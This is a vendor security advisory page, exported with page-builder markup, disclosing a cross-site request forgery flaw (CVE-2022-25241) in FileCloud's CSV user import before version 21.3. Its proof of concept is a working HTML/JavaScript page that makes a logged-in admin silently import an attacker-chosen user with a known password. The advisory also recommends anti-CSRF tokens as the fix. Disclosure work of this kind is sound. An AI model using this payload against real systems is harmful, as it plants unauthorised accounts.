{"id":18001,"date":"2022-04-14T10:42:55","date_gmt":"2022-04-14T08:42:55","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=18001"},"modified":"2022-04-26T13:33:30","modified_gmt":"2022-04-26T11:33:30","slug":"usd-2021-0028","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2021-0028\/","title":{"rendered":"usd-2021-0028"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.16\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.16\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]<\/p>\n

usd-2021-0028 (CVE-2022-25241) | FileCloud<\/h1>\n

Advisory ID<\/strong>: usd-2021-0028
CVE ID<\/strong>: CVE-2022-25241
<\/em>CVE URL<\/strong>: https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2022-25241<\/a>
Affected Product<\/strong>: FileCloud
Affected Versions<\/strong>: <\u00a021.3
Vulnerability Type<\/strong>: CWE-352<\/a>: Cross-Site Request Forgery (CSRF)
Security Risk<\/strong>: Medium
Vendor URL<\/strong>: https:\/\/www.filecloud.com\/<\/a>\u00a0<\/a>
Vendor Status<\/strong>: Fixed<\/p>\n

<\/span><\/p>\n

Description<\/h3>\n

FileCloud<\/em>'s CSV user import functionality prior v21.3 is vulnerable to Cross-Site Request Forgery (CSRF).<\/p>\n

A Cross-Site Request Forgery (CSRF) attack leads to the execution of unwanted actions in a web application on behalf of a user, who is already logged into the application. When importing users, the application does not validate an anti-CSRF token. Thus, the request for this functionality can be used for CSRF attacks to force an authenticated user into importing new users into the application.\u00a0<\/p>\n

<\/span><\/p>\n

Proof of Concept (PoC)<\/h3>\n

The following screenshot shows the application in its initial state. No user with the name \"pwnuser<\/strong>\" has been created at this point.<\/p>\n

[\/et_pb_text][et_pb_image src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2022\/02\/filecloud_csrf_createuser_1.png\" title_text=\"filecloud_csrf_createuser_1\" _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][\/et_pb_image][et_pb_text _builder_version=\"4.16\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<\/p>\n

An attacker can construct a web page containing a button with the following HTML code. If the \"Submit Request<\/em>\" button is clicked by an authenticated admin with a valid session in FileCloud, a request is executed on behalf of this user and a CSV user import is triggered without the user himself noticing. An attacker gains access to the application and can log in.<\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.16\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" global_colors_info=\"{}\"]<\/p>\n

<html>
<!-- CSRF PoC -->
<body>
<script>history.pushState('', '', '\/')<\/script>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open(\"POST\", \"http:\\\/\\\/localhost\\\/admin\\\/?op=import&sendapprovalemail=0&sendpwdasplaintext=0\", true);
xhr.setRequestHeader(\"Accept\", \"text\\\/html,application\\\/xhtml+xml,application\\\/xml;q=0.9,image\\\/webp,*\\\/*;q=0.8\");
xhr.setRequestHeader(\"Accept-Language\", \"en-US,en;q=0.5\");
xhr.setRequestHeader(\"Content-Type\", \"multipart\\\/form-data; boundary=---------------------------32620124844091845650591418511\");
xhr.withCredentials = true;
var body = \"-----------------------------32620124844091845650591418511\\r\\n\" +
\"Content-Disposition: form-data; name=\\\"uploadFormElement\\\"; filename=\\\"users.csv\\\"\\r\\n\" +
\"Content-Type: text\/csv\\r\\n\" +
\"\\r\\n\" +
\"UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified\\n\" +
\"pwnuser,pwnuser@example.com,Passw0rd1337,csrfPOC,GUEST,,EVERYONE,YES\\n\" +
\"\\r\\n\" +
\"-----------------------------32620124844091845650591418511--\\r\\n\";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
<\/script>
<form action=\"#\">
<input type=\"button\" value=\"Submit request\" onclick=\"submitRequest();\" \/>
<\/form>
<\/body>
<\/html><\/pre>\n
[\/et_pb_text][et_pb_text _builder_version=\"4.16\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\" global_colors_info=\"{}\"]<\/p>\n
The web page generated by the attacker can be displayed in an arbitrary style. The following screenshot shows what this page would look like:<\/p>\n
[\/et_pb_text][et_pb_image src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2022\/02\/filecloud_csrf_createuser_2.png\" title_text=\"filecloud_csrf_createuser_2\" _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][\/et_pb_image][et_pb_text _builder_version=\"4.16\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\" global_colors_info=\"{}\"]<\/p>\n
When an admin clicks on the button, a new user is created in FileCloud. After the click the authenticated user would send the following request to the FileCloud instance:<\/p>\n
[\/et_pb_text][et_pb_image src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2022\/02\/filecloud_csrf_createuser_3.png\" title_text=\"filecloud_csrf_createuser_3\" _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][\/et_pb_image][et_pb_text _builder_version=\"4.16\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\" global_colors_info=\"{}\"]<\/p>\n
When listing the registered users, the newly created user \"pwnuser<\/strong>\" now appears:<\/p>\n
[\/et_pb_text][et_pb_image src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2022\/02\/filecloud_csrf_createuser_4.png\" title_text=\"filecloud_csrf_createuser_4\" _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][\/et_pb_image][et_pb_text _builder_version=\"4.16\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]<\/p>\n
\n
\n
Fix<\/h3>\n
It is recommended to secure every user action using an anti-CSRF token. Such a token consists of a pseudorandom value which is transmitted with every user request using a hidden field. Upon arrival of a new user request the server validates the anti-CSRF token. The user request is then processed only in case of a successful token validation. Such a token has to be generated at least once for every user session.<\/p>\n
<\/h3>\n
References<\/h3>\n